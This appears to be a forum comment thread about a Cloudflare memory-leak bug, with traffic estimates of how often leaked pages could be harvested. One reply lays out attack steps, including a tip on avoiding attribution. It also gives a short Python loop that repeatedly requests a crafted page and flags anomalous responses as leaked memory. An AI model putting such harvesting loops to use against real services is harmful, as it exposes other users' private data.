Comment by user5994461
8 years ago
Intensive mining indeed, if it's true that it takes 3.3M requests to get one leaked page.
With a fixed 100 Mbps connection and assuming 2 kB per HTTP request-response pair, you could hope for one leak every 11 minutes at the cost of 6.6 GB of traffic, i.e. a constant ~5k requests/s.
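A back-of-the-envelope sketch of that arithmetic (the 3.3M figure is from this thread; the link speed and per-exchange size are the assumptions above):

```python
LINK_BPS = 100e6            # fixed 100 Mbps connection
BYTES_PER_EXCHANGE = 2_000  # assumed request + response size
REQS_PER_LEAK = 3.3e6       # ~1 leak per 3.3M requests (from the thread)

raw_rps = LINK_BPS / 8 / BYTES_PER_EXCHANGE             # 6250 req/s on paper
rps = 5_000                                             # rounded down for overhead
minutes_per_leak = REQS_PER_LEAK / rps / 60             # ~11 minutes per leak
gb_per_leak = REQS_PER_LEAK * BYTES_PER_EXCHANGE / 1e9  # 6.6 GB of traffic
print(raw_rps, minutes_per_leak, gb_per_leak)           # 6250.0 11.0 6.6
```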
Maybe if Google reassigned all of its SHAttered resources to the task...
... and then I realize that we're talking about Cloudflare, and my mining bot would just get served a CAPTCHA.
---
edit: correction. The bug affected only some pages with certain content-filtering options enabled, and was more prominent under specific circumstances.
Hence the 1-in-3.3M average. An attacker could allegedly leak data much more reliably by identifying the patterns most likely to trigger leaks.
Couldn't an attacker construct a page that triggers the memory leak and just keep accessing that page to get different pieces of memory?
Yes. Sign up for the service, configure a page with crafted invalid HTML at your origin, activate all three buggy features, and spam it with requests.
If you can find such a page already, just jump to the last step and avoid signing your work.
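A minimal sketch of that last step, assuming a hypothetical crafted page you control (the URL and loop count are illustrative, not from the thread):

```python
import requests

# Hypothetical page at your origin containing the malformed HTML
# that trips the buggy parser; fetched through Cloudflare.
TARGET = "https://example.com/crafted.html"

expected = requests.get(TARGET).content  # baseline copy of the static page

for i in range(3_300_000):  # ~1 leak expected at the observed average rate
    body = requests.get(TARGET).content
    if body != expected:
        # Any deviation from the static baseline is candidate leaked memory.
        print(f"request {i}: anomalous response, {len(body)} bytes")
```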
That 1-in-3.3M rate is what was observed on the Cloudflare end. Without multiplying it by how many pages Cloudflare served in a given amount of time, you can't determine the impact. Assuming the affected sites were hit en masse, a targeted attack from a single connection would be minuscule compared to the pages Cloudflare serves.
Cloudflare is serving far more than 100 Mbps; the attacker only has to zero in on what's fruitful, which yields a hit rate far higher than the 1-in-3.3M Cloudflare sees while serving millions of innocuous requests.
Mid-2016 they were serving 4M requests per second.
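For scale, combining the two figures in this thread (a rough sketch that assumes the average leak rate applies uniformly across all traffic):

```python
CF_RPS = 4e6           # Cloudflare-wide requests/s, mid-2016
REQS_PER_LEAK = 3.3e6  # ~1 leak per 3.3M requests on average

leaks_per_second = CF_RPS / REQS_PER_LEAK  # ≈ 1.2 leaks/s network-wide
leaks_per_day = leaks_per_second * 86_400  # ≈ 105,000 leaked pages/day
print(leaks_per_second, leaks_per_day)
```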
Thank you. This is exactly the missing piece of information that everybody should be aware of.
Botnets